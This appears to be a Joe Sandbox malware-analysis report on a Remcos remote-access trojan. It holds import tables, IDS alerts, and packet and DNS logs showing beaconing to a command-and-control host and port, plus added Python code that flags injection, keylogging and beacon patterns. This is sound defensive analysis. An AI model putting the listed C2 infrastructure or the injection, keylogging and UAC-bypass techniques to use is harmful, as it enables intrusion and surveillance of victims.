.rdata | 0x57000 | 0x18b00 | 0x18c00 | 0ba285a9a28b1dec254a7539ab18f8d0 | False | 0.4981455176767677 | OpenPGP Secret Key Version 6 | 5.75873851406894 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x70000 | 0x5d8c | 0xe00 | 06414e748130e7e668ba2ba172d63448 | False | 0.22684151785714285 | data | 3.093339598098017 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x76000 | 0x4b40 | 0x4c00 | 9ecd6f0b726b681984dce52406e263ac | False | 0.2829461348684211 | data | 3.9860864635240127 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x7b000 | 0x3b88 | 0x3c00 | b875bbd60cc90da8a22f40034fe9606e | False | 0.7575520833333333 | data | 6.702930468027394 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x7618c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.3421985815602837
RT_ICON | 0x765f4 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.27704918032786885
RT_ICON | 0x76f7c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.23686679174484052
RT_ICON | 0x78024 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.22977178423236513
RT_RCDATA | 0x7a5cc | 0x532 | COM executable for DOS | | | 1.0082706766917293
RT_GROUP_ICON | 0x7ab00 | 0x3e | data | English | United States | 0.8064516129032258
DLL | Imports
KERNEL32.dll | ExpandEnvironmentStringsA, GetLongPathNameW, CopyFileW, GetLocaleInfoA, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, VirtualProtect, SetLastError, VirtualFree, VirtualAlloc, LoadLibraryA, GetNativeSystemInfo, HeapAlloc, GetProcessHeap, FreeLibrary, IsBadReadPtr, GetTempPathW, OpenProcess, OpenMutexA, lstrcatW, GetCurrentProcessId, GetTempFileNameW, GetSystemDirectoryA, GlobalAlloc, GlobalLock, GetTickCount, GlobalUnlock, WriteProcessMemory, ResumeThread, GetThreadContext, ReadProcessMemory, CreateProcessW, SetThreadContext, LocalAlloc, GlobalFree, MulDiv, SizeofResource, QueryDosDeviceW, FindFirstVolumeW, GetConsoleScreenBufferInfo, SetConsoleTextAttribute, lstrlenW, GetStdHandle, SetFilePointer, FindResourceA, LockResource, LoadResource, LocalFree, FindVolumeClose, GetVolumePathNamesForVolumeNameW, lstrcpyW, SetConsoleOutputCP, FormatMessageA, FindFirstFileA, AllocConsole, lstrcmpW, GetModuleFileNameA, lstrcpynA, QueryPerformanceFrequency, QueryPerformanceCounter, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, HeapSize, WriteConsoleW, SetStdHandle, SetEnvironmentVariableW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindFirstFileExA, HeapReAlloc, ReadConsoleW, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, GetTimeZoneInformation, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, GetACP, GetModuleHandleExW, MoveFileExW, LoadLibraryExW, RaiseException, RtlUnwind, GetCPInfo, GetStringTypeW, GetLocaleInfoW, LCMapStringW, CompareStringW, MultiByteToWideChar, DecodePointer, EncodePointer, TlsFree, TlsSetValue, GetFileSize, TerminateThread, GetLastError, GetModuleHandleA, RemoveDirectoryW, MoveFileW, SetFilePointerEx, CreateDirectoryW, GetLogicalDriveStringsA, DeleteFileW, FindNextFileA, DeleteFileA, SetFileAttributesW, GetFileAttributesW, FindClose, lstrlenA, GetDriveTypeA, FindNextFileW, GetFileSizeEx, FindFirstFileW, GetModuleHandleW, ExitProcess, GetProcAddress, CreateMutexA, GetCurrentProcess, CreateProcessA, PeekNamedPipe, CreatePipe, TerminateProcess, ReadFile, HeapFree, HeapCreate, CreateEventA, GetLocalTime, CreateThread, SetEvent, CreateEventW, WaitForSingleObject, Sleep, GetModuleFileNameW, CloseHandle, ExitThread, CreateFileW, WriteFile, FindNextVolumeW, TlsGetValue, TlsAlloc, SwitchToThread, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, IsProcessorFeaturePresent, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, WaitForSingleObjectEx, ResetEvent, InitializeCriticalSectionAndSpinCount, SetEndOfFile
USER32.dll | DefWindowProcA, TranslateMessage, DispatchMessageA, GetMessageA, GetWindowTextW, wsprintfW, GetClipboardData, UnhookWindowsHookEx, GetForegroundWindow, ToUnicodeEx, GetKeyboardLayout, SetWindowsHookExA, CloseClipboard, OpenClipboard, GetKeyboardState, CallNextHookEx, GetKeyboardLayoutNameA, GetKeyState, GetWindowTextLengthW, GetWindowThreadProcessId, SetForegroundWindow, SetClipboardData, EnumWindows, ExitWindowsEx, EmptyClipboard, ShowWindow, SetWindowTextW, MessageBoxW, IsWindowVisible, CreateWindowExA, SendInput, EnumDisplaySettingsW, mouse_event, MapVirtualKeyA, TrackPopupMenu, CreatePopupMenu, AppendMenuA, RegisterClassExA, GetCursorPos, SystemParametersInfoW, GetIconInfo, GetSystemMetrics, CloseWindow, DrawIcon
GDI32.dll | BitBlt, CreateCompatibleBitmap, CreateCompatibleDC, StretchBlt, GetDIBits, DeleteDC, DeleteObject, CreateDCA, GetObjectA, SelectObject
ADVAPI32.dll | LookupPrivilegeValueA, CryptAcquireContextA, CryptGenRandom, CryptReleaseContext, GetUserNameW, RegEnumKeyExA, QueryServiceStatus, CloseServiceHandle, OpenSCManagerW, OpenSCManagerA, ControlService, StartServiceW, QueryServiceConfigW, ChangeServiceConfigW, OpenServiceW, EnumServicesStatusW, AdjustTokenPrivileges, RegDeleteKeyA, OpenProcessToken, RegCreateKeyA, RegCloseKey, RegQueryInfoKeyW, RegQueryValueExA, RegCreateKeyExW, RegEnumKeyExW, RegSetValueExW, RegSetValueExA, RegOpenKeyExA, RegOpenKeyExW, RegCreateKeyW, RegDeleteValueW, RegEnumValueW, RegQueryValueExW
SHELL32.dll | ShellExecuteExA, Shell_NotifyIconA, ExtractIconA, ShellExecuteW
ole32.dll | CoInitializeEx, CoGetObject, CoUninitialize
SHLWAPI.dll | StrToIntA, PathFileExistsW, PathFileExistsA
WINMM.dll | mciSendStringA, mciSendStringW, waveInClose, waveInStop, waveInStart, waveInUnprepareHeader, waveInOpen, waveInAddBuffer, waveInPrepareHeader, PlaySoundW
WS2_32.dll | send, WSAStartup, socket, connect, WSAGetLastError, recv, closesocket, inet_ntoa, htons, htonl, getservbyname, ntohs, getservbyport, gethostbyaddr, inet_addr, WSASetLastError, gethostbyname
urlmon.dll | URLOpenBlockingStreamW, URLDownloadToFileW
gdiplus.dll | GdipAlloc, GdiplusStartup, GdipGetImageEncoders, GdipLoadImageFromStream, GdipSaveImageToStream, GdipGetImageEncodersSize, GdipFree, GdipDisposeImage, GdipCloneImage
WININET.dll | InternetOpenUrlW, InternetOpenW, InternetCloseHandle, InternetReadFile
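Added example (editor's code, not part of the Joe Sandbox report): a capability-triage pass over an import table like the one above. Taken alone, most of these imports are unremarkable; what makes the table worth reading is the combinations, such as CreateProcessW with WriteProcessMemory, GetThreadContext, SetThreadContext and ResumeThread (thread-context injection), SetWindowsHookExA with ToUnicodeEx and GetKeyboardState (a keyboard hook that resolves keystrokes), or CoGetObject with CoInitializeEx (the COM elevation moniker behind the CMSTPLUA-style UAC bypass the report flags). The IMPORTS table in the block is a subset copied from the report's import list; the RULES and the scoring are the editor's own heuristics, and the single-API rule for IsDebuggerPresent is deliberately marked weak because the MSVC CRT startup imports it too.

```python
# Added example, not from the Joe Sandbox report: map an import table to
# behavioural capabilities. IMPORTS is a subset of the report's import list;
# RULES and the scoring are the editor's own heuristics.
from typing import Dict, List, Set

IMPORTS: Dict[str, List[str]] = {  # subset of the report's DLL -> imports table
    "KERNEL32.dll": [
        "CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW", "OpenProcess",
        "WriteProcessMemory", "ReadProcessMemory", "GetThreadContext", "SetThreadContext",
        "ResumeThread", "CreateProcessW", "VirtualAlloc", "VirtualProtect", "IsDebuggerPresent",
        "CreateMutexA", "GetTempPathW", "DeleteFileW", "MoveFileExW",
    ],
    "USER32.dll": [
        "SetWindowsHookExA", "CallNextHookEx", "UnhookWindowsHookEx", "ToUnicodeEx",
        "GetKeyboardState", "GetKeyboardLayout", "OpenClipboard", "GetClipboardData",
        "SetClipboardData", "GetForegroundWindow", "GetWindowTextW", "SendInput", "mouse_event",
    ],
    "GDI32.dll": ["BitBlt", "CreateCompatibleBitmap", "CreateCompatibleDC", "GetDIBits"],
    "ADVAPI32.dll": [
        "CryptAcquireContextA", "CryptGenRandom", "OpenSCManagerW", "ChangeServiceConfigW",
        "ControlService", "RegCreateKeyExW", "RegSetValueExW", "AdjustTokenPrivileges",
    ],
    "ole32.dll": ["CoInitializeEx", "CoGetObject", "CoUninitialize"],
    "WINMM.dll": ["waveInOpen", "waveInStart", "waveInAddBuffer", "waveInClose"],
    "WS2_32.dll": ["socket", "connect", "send", "recv", "gethostbyname"],
    "urlmon.dll": ["URLDownloadToFileW", "URLOpenBlockingStreamW"],
}

# capability -> imports that must ALL be present. Requiring combinations keeps
# the noise down; the last rule is a single API and is deliberately weak.
RULES: Dict[str, Set[str]] = {
    "thread-context injection / process hollowing":
        {"CreateProcessW", "WriteProcessMemory", "GetThreadContext", "SetThreadContext", "ResumeThread"},
    "keylogging via global hook": {"SetWindowsHookExA", "CallNextHookEx", "ToUnicodeEx", "GetKeyboardState"},
    "clipboard capture": {"OpenClipboard", "GetClipboardData"},
    "screen capture": {"BitBlt", "CreateCompatibleBitmap", "GetDIBits"},
    "microphone capture": {"waveInOpen", "waveInStart", "waveInAddBuffer"},
    "COM elevation moniker (CMSTPLUA-style UAC bypass)": {"CoInitializeEx", "CoGetObject"},
    "service tampering": {"OpenSCManagerW", "ChangeServiceConfigW", "ControlService"},
    "registry persistence": {"RegCreateKeyExW", "RegSetValueExW"},
    "process enumeration": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
    "raw-socket C2": {"socket", "connect", "send", "recv"},
    "download-and-execute": {"URLDownloadToFileW"},
    "anti-debug check (weak: CRT startup imports it too)": {"IsDebuggerPresent"},
}
STRONG_PAIR = {"thread-context injection / process hollowing", "keylogging via global hook"}


def flatten(imports: Dict[str, List[str]]) -> Set[str]:
    """All imported function names across every DLL."""
    return {fn for fns in imports.values() for fn in fns}


def match_capabilities(imports: Dict[str, List[str]]) -> Dict[str, Set[str]]:
    """Return {capability: required imports} for each rule that is fully satisfied."""
    present = flatten(imports)
    return {cap: need for cap, need in RULES.items() if need <= present}


def triage_score(imports: Dict[str, List[str]]) -> int:
    """One point per capability, plus three when injection and a keyboard hook
    co-occur, which is the classic RAT/stealer combination."""
    caps = match_capabilities(imports)
    return len(caps) + (3 if STRONG_PAIR <= set(caps) else 0)


if __name__ == "__main__":
    for cap in sorted(match_capabilities(IMPORTS)):
        print(cap)
    print("score:", triage_score(IMPORTS))
```

Against the subset above every rule fires, which is the expected result for a Remcos build; on a typical installer or updater you would see download-and-execute and registry persistence but neither injection nor the hook. The rules are a starting point for triage, not a verdict: a signed remote-support tool imports much the same set.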
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-08T16:00:33.207020+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.8 | 49705 | 179.15.136.6 | 1997 | TCP
2025-01-08T16:00:35.337900+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.8 | 49706 | 178.237.33.50 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 8, 2025 16:00:32.521557093 CET | 49705 | 1997 | 192.168.2.8 | 179.15.136.6
Jan 8, 2025 16:00:32.526746988 CET | 1997 | 49705 | 179.15.136.6 | 192.168.2.8
Jan 8, 2025 16:00:32.526808977 CET | 49705 | 1997 | 192.168.2.8 | 179.15.136.6
Jan 8, 2025 16:00:32.532689095 CET | 49705 | 1997 | 192.168.2.8 | 179.15.136.6
Jan 8, 2025 16:00:32.538913012 CET | 1997 | 49705 | 179.15.136.6 | 192.168.2.8
Jan 8, 2025 16:00:33.162544966 CET | 1997 | 49705 | 179.15.136.6 | 192.168.2.8
Jan 8, 2025 16:00:33.207020044 CET | 49705 | 1997 | 192.168.2.8 | 179.15.136.6
Jan 8, 2025 16:00:33.292570114 CET | 1997 | 49705 | 179.15.136.6 | 192.168.2.8
Jan 8, 2025 16:00:33.297261000 CET | 49705 | 1997 | 192.168.2.8 | 179.15.136.6
Jan 8, 2025 16:00:33.302021027 CET | 1997 | 49705 | 179.15.136.6 | 192.168.2.8
Jan 8, 2025 16:00:33.302094936 CET | 49705 | 1997 | 192.168.2.8 | 179.15.136.6
Jan 8, 2025 16:00:33.306893110 CET | 1997 | 49705 | 179.15.136.6 | 192.168.2.8
Jan 8, 2025 16:00:33.306981087 CET | 49705 | 1997 | 192.168.2.8 | 179.15.136.6
Jan 8, 2025 16:00:33.311758041 CET | 1997 | 49705 | 179.15.136.6 | 192.168.2.8
Jan 8, 2025 16:00:33.653808117 CET | 1997 | 49705 | 179.15.136.6 | 192.168.2.8
Jan 8, 2025 16:00:33.656246901 CET | 49705 | 1997 | 192.168.2.8 | 179.15.136.6
Jan 8, 2025 16:00:33.661036968 CET | 1997 | 49705 | 179.15.136.6 | 192.168.2.8
Jan 8, 2025 16:00:33.789319992 CET | 1997 | 49705 | 179.15.136.6 | 192.168.2.8
Jan 8, 2025 16:00:33.831995964 CET | 49705 | 1997 | 192.168.2.8 | 179.15.136.6
Jan 8, 2025 16:00:34.709388018 CET | 49706 | 80 | 192.168.2.8 | 178.237.33.50
Jan 8, 2025 16:00:34.714263916 CET | 80 | 49706 | 178.237.33.50 | 192.168.2.8
Jan 8, 2025 16:00:34.714356899 CET | 49706 | 80 | 192.168.2.8 | 178.237.33.50
Jan 8, 2025 16:00:34.714498997 CET | 49706 | 80 | 192.168.2.8 | 178.237.33.50
Jan 8, 2025 16:00:34.719269991 CET | 80 | 49706 | 178.237.33.50 | 192.168.2.8
Jan 8, 2025 16:00:35.337820053 CET | 80 | 49706 | 178.237.33.50 | 192.168.2.8
Jan 8, 2025 16:00:35.337899923 CET | 49706 | 80 | 192.168.2.8 | 178.237.33.50
Jan 8, 2025 16:00:35.357176065 CET | 49705 | 1997 | 192.168.2.8 | 179.15.136.6
Jan 8, 2025 16:00:35.361964941 CET | 1997 | 49705 | 179.15.136.6 | 192.168.2.8
Jan 8, 2025 16:00:36.352863073 CET | 80 | 49706 | 178.237.33.50 | 192.168.2.8
Jan 8, 2025 16:00:36.352982998 CET | 49706 | 80 | 192.168.2.8 | 178.237.33.50
Jan 8, 2025 16:00:37.058690071 CET | 1997 | 49705 | 179.15.136.6 | 192.168.2.8
Jan 8, 2025 16:00:37.060376883 CET | 49705 | 1997 | 192.168.2.8 | 179.15.136.6
Jan 8, 2025 16:00:37.065135956 CET | 1997 | 49705 | 179.15.136.6 | 192.168.2.8
Jan 8, 2025 16:01:07.051949978 CET | 1997 | 49705 | 179.15.136.6 | 192.168.2.8
Jan 8, 2025 16:01:07.053483963 CET | 49705 | 1997 | 192.168.2.8 | 179.15.136.6
Jan 8, 2025 16:01:07.058523893 CET | 1997 | 49705 | 179.15.136.6 | 192.168.2.8
Jan 8, 2025 16:01:37.083986044 CET | 1997 | 49705 | 179.15.136.6 | 192.168.2.8
Jan 8, 2025 16:01:37.085567951 CET | 49705 | 1997 | 192.168.2.8 | 179.15.136.6
Jan 8, 2025 16:01:37.090348959 CET | 1997 | 49705 | 179.15.136.6 | 192.168.2.8
Jan 8, 2025 16:02:07.109252930 CET | 1997 | 49705 | 179.15.136.6 | 192.168.2.8
Jan 8, 2025 16:02:07.111685038 CET | 49705 | 1997 | 192.168.2.8 | 179.15.136.6
Jan 8, 2025 16:02:07.116564989 CET | 1997 | 49705 | 179.15.136.6 | 192.168.2.8
Jan 8, 2025 16:02:24.691879034 CET | 49706 | 80 | 192.168.2.8 | 178.237.33.50
Jan 8, 2025 16:02:25.160372019 CET | 49706 | 80 | 192.168.2.8 | 178.237.33.50
Jan 8, 2025 16:02:25.863492966 CET | 49706 | 80 | 192.168.2.8 | 178.237.33.50
Jan 8, 2025 16:02:27.162488937 CET | 49706 | 80 | 192.168.2.8 | 178.237.33.50
Jan 8, 2025 16:02:29.660361052 CET | 49706 | 80 | 192.168.2.8 | 178.237.33.50
Jan 8, 2025 16:02:34.503794909 CET | 49706 | 80 | 192.168.2.8 | 178.237.33.50
Jan 8, 2025 16:02:37.077929020 CET | 1997 | 49705 | 179.15.136.6 | 192.168.2.8
Jan 8, 2025 16:02:37.079616070 CET | 49705 | 1997 | 192.168.2.8 | 179.15.136.6
Jan 8, 2025 16:02:37.085167885 CET | 1997 | 49705 | 179.15.136.6 | 192.168.2.8
Jan 8, 2025 16:02:44.254204988 CET | 49706 | 80 | 192.168.2.8 | 178.237.33.50
Jan 8, 2025 16:03:07.119739056 CET | 1997 | 49705 | 179.15.136.6 | 192.168.2.8
Jan 8, 2025 16:03:07.121289015 CET | 49705 | 1997 | 192.168.2.8 | 179.15.136.6
Jan 8, 2025 16:03:07.126118898 CET | 1997 | 49705 | 179.15.136.6 | 192.168.2.8
Jan 8, 2025 16:03:37.252716064 CET | 1997 | 49705 | 179.15.136.6 | 192.168.2.8
Jan 8, 2025 16:03:37.254055023 CET | 49705 | 1997 | 192.168.2.8 | 179.15.136.6
Jan 8, 2025 16:03:37.258866072 CET | 1997 | 49705 | 179.15.136.6 | 192.168.2.8
Jan 8, 2025 16:03:41.824778080 CET | 1997 | 49705 | 179.15.136.6 | 192.168.2.8
Jan 8, 2025 16:03:41.894922972 CET | 49705 | 1997 | 192.168.2.8 | 179.15.136.6
Jan 8, 2025 16:03:42.204591990 CET | 49705 | 1997 | 192.168.2.8 | 179.15.136.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 8, 2025 16:00:32.362035036 CET | 53022 | 53 | 192.168.2.8 | 1.1.1.1
Jan 8, 2025 16:00:32.517834902 CET | 53 | 53022 | 1.1.1.1 | 192.168.2.8
Jan 8, 2025 16:00:34.698679924 CET | 56539 | 53 | 192.168.2.8 | 1.1.1.1
Jan 8, 2025 16:00:34.705800056 CET | 53 | 56539 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 8, 2025 16:00:32.362035036 CET | 192.168.2.8 | 1.1.1.1 | 0xbbc3 | Standard query (0) | luiscaseres.gleeze.com | A (IP address) | IN (0x0001) | false
Jan 8, 2025 16:00:34.698679924 CET | 192.168.2.8 | 1.1.1.1 | 0x40b1 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 8, 2025 16:00:32.517834902 CET | 1.1.1.1 | 192.168.2.8 | 0xbbc3 | No error (0) | luiscaseres.gleeze.com | | 179.15.136.6 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 16:00:34.705800056 CET | 1.1.1.1 | 192.168.2.8 | 0x40b1 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                      • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49706 | 178.237.33.50 | 80 | 7784 | C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 16:00:34.714498997 CET | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Jan 8, 2025 16:00:35.337820053 CET | 1171 | IN | HTTP/1.1 200 OK
                                      date: Wed, 08 Jan 2025 15:00:35 GMT
                                      server: Apache
                                      content-length: 963
                                      content-type: application/json; charset=utf-8
                                      cache-control: public, max-age=300
                                      access-control-allow-origin: *
                                      Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                      Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
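Added example (editor's code, not part of the Joe Sandbox report) covering the TCP packet table and the HTTP session above. Two things in that traffic are worth turning into detection logic: the client sends a packet to 179.15.136.6:1997 at 16:00:37, 16:01:07, 16:01:37, 16:02:07, 16:02:37, 16:03:07 and 16:03:37, a 30-second keep-alive that survives even though the first second of the session is a dense handshake burst; and the only HTTP request is a GET /json.gp to geoplugin.net, the public geolocation check that precedes the first beacon. The block rebuilds flows from the report's own rows (only the client-to-server rows are copied in, labelled as such), finds the dominant inter-packet gap per flow by clustering gaps rather than averaging them, and flags the geo-IP host. The support and period thresholds and the host list are the editor's choices. Note that the client packets on the geoplugin flow between 16:02:24 and 16:02:44 arrive with roughly doubling gaps, which is consistent with TCP retransmission backoff after the server went quiet; the clustering correctly leaves that flow unflagged.

```python
# Added example, not from the Joe Sandbox report: rebuild flows from the
# report's packet list, flag periodic client->server traffic (a RAT keep-alive)
# and the public geo-IP lookup. PACKETS holds only the client->server rows
# copied from the report's TCP table; the thresholds are the editor's.
from collections import defaultdict
from datetime import datetime
from statistics import median
from typing import Dict, List, Tuple

PACKETS = """
Jan 8, 2025 16:00:32.521557093 CET 49705 1997 192.168.2.8 179.15.136.6
Jan 8, 2025 16:00:32.526808977 CET 49705 1997 192.168.2.8 179.15.136.6
Jan 8, 2025 16:00:32.532689095 CET 49705 1997 192.168.2.8 179.15.136.6
Jan 8, 2025 16:00:33.207020044 CET 49705 1997 192.168.2.8 179.15.136.6
Jan 8, 2025 16:00:33.297261000 CET 49705 1997 192.168.2.8 179.15.136.6
Jan 8, 2025 16:00:33.302094936 CET 49705 1997 192.168.2.8 179.15.136.6
Jan 8, 2025 16:00:33.306981087 CET 49705 1997 192.168.2.8 179.15.136.6
Jan 8, 2025 16:00:33.656246901 CET 49705 1997 192.168.2.8 179.15.136.6
Jan 8, 2025 16:00:33.831995964 CET 49705 1997 192.168.2.8 179.15.136.6
Jan 8, 2025 16:00:34.709388018 CET 49706 80 192.168.2.8 178.237.33.50
Jan 8, 2025 16:00:34.714356899 CET 49706 80 192.168.2.8 178.237.33.50
Jan 8, 2025 16:00:34.714498997 CET 49706 80 192.168.2.8 178.237.33.50
Jan 8, 2025 16:00:35.337899923 CET 49706 80 192.168.2.8 178.237.33.50
Jan 8, 2025 16:00:35.357176065 CET 49705 1997 192.168.2.8 179.15.136.6
Jan 8, 2025 16:00:36.352982998 CET 49706 80 192.168.2.8 178.237.33.50
Jan 8, 2025 16:00:37.060376883 CET 49705 1997 192.168.2.8 179.15.136.6
Jan 8, 2025 16:01:07.053483963 CET 49705 1997 192.168.2.8 179.15.136.6
Jan 8, 2025 16:01:37.085567951 CET 49705 1997 192.168.2.8 179.15.136.6
Jan 8, 2025 16:02:07.111685038 CET 49705 1997 192.168.2.8 179.15.136.6
Jan 8, 2025 16:02:24.691879034 CET 49706 80 192.168.2.8 178.237.33.50
Jan 8, 2025 16:02:25.160372019 CET 49706 80 192.168.2.8 178.237.33.50
Jan 8, 2025 16:02:25.863492966 CET 49706 80 192.168.2.8 178.237.33.50
Jan 8, 2025 16:02:27.162488937 CET 49706 80 192.168.2.8 178.237.33.50
Jan 8, 2025 16:02:29.660361052 CET 49706 80 192.168.2.8 178.237.33.50
Jan 8, 2025 16:02:34.503794909 CET 49706 80 192.168.2.8 178.237.33.50
Jan 8, 2025 16:02:37.079616070 CET 49705 1997 192.168.2.8 179.15.136.6
Jan 8, 2025 16:02:44.254204988 CET 49706 80 192.168.2.8 178.237.33.50
Jan 8, 2025 16:03:07.121289015 CET 49705 1997 192.168.2.8 179.15.136.6
Jan 8, 2025 16:03:37.254055023 CET 49705 1997 192.168.2.8 179.15.136.6
Jan 8, 2025 16:03:41.894922972 CET 49705 1997 192.168.2.8 179.15.136.6
Jan 8, 2025 16:03:42.204591990 CET 49705 1997 192.168.2.8 179.15.136.6
""".strip().splitlines()

Flow = Tuple[str, str, int]  # (source ip, destination ip, destination port)


def parse_line(line: str) -> Tuple[datetime, Flow]:
    """'Jan 8, 2025 16:00:32.521557093 CET 49705 1997 192.168.2.8 179.15.136.6'
    -> (datetime, flow). The 9-digit fraction is trimmed to microseconds."""
    p = line.split()
    ts = datetime.strptime(" ".join(p[:4])[:-3], "%b %d, %Y %H:%M:%S.%f")
    return ts, (p[7], p[8], int(p[6]))


def group_flows(lines: List[str]) -> Dict[Flow, List[datetime]]:
    """Packet timestamps per (src, dst, dport) flow."""
    flows: Dict[Flow, List[datetime]] = defaultdict(list)
    for line in lines:
        ts, flow = parse_line(line)
        flows[flow].append(ts)
    return flows


def dominant_period(times: List[datetime], min_gap: float = 1.0, tol: float = 0.1) -> Tuple[float, int]:
    """(period seconds, support): the most common inter-packet gap, merging gaps
    within tol of each other. Sub-second gaps (handshake, ACK bursts) are
    dropped so a TLS setup burst cannot hide a slow beacon."""
    ts = sorted(times)
    gaps = [g for g in ((b - a).total_seconds() for a, b in zip(ts, ts[1:])) if g >= min_gap]
    best = (0.0, 0)
    for g in gaps:
        cluster = [h for h in gaps if abs(h - g) <= tol * g]
        if len(cluster) > best[1]:
            best = (median(cluster), len(cluster))
    return best


def find_beacons(lines: List[str], min_support: int = 4, min_period: float = 5.0) -> Dict[Flow, Tuple[float, int]]:
    """Flows whose dominant gap repeats at least min_support times."""
    hits: Dict[Flow, Tuple[float, int]] = {}
    for flow, times in group_flows(lines).items():
        period, support = dominant_period(times)
        if support >= min_support and period >= min_period:
            hits[flow] = (round(period, 1), support)
    return hits


GEOIP_HOSTS = {"geoplugin.net"}  # from the report; extend with other geo-IP services per local policy


def geoip_lookups(requests: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """HTTP (host, path) pairs that query a public geolocation service."""
    return [(h, p) for h, p in requests if h.lower() in GEOIP_HOSTS]


if __name__ == "__main__":
    for flow, (period, n) in find_beacons(PACKETS).items():
        print(f"beacon {flow[0]} -> {flow[1]}:{flow[2]} every ~{period}s ({n} samples)")
    print("geo-IP lookups:", geoip_lookups([("geoplugin.net", "/json.gp")]))
```

On the rows above the C2 flow is reported as a 30.0-second beacon with six supporting gaps and the geoplugin flow is not flagged. Beaconing on a fixed 30-second period with almost no jitter is the strongest network-side signal in this report; the JA3 alert at 16:00:33 fires on the TLS ClientHello that opens the same connection, so the two detections corroborate each other.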



Target ID: 0
Start time: 10:00:31
Start date: 08/01/2025
Path: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe
Wow64 process (32bit): true
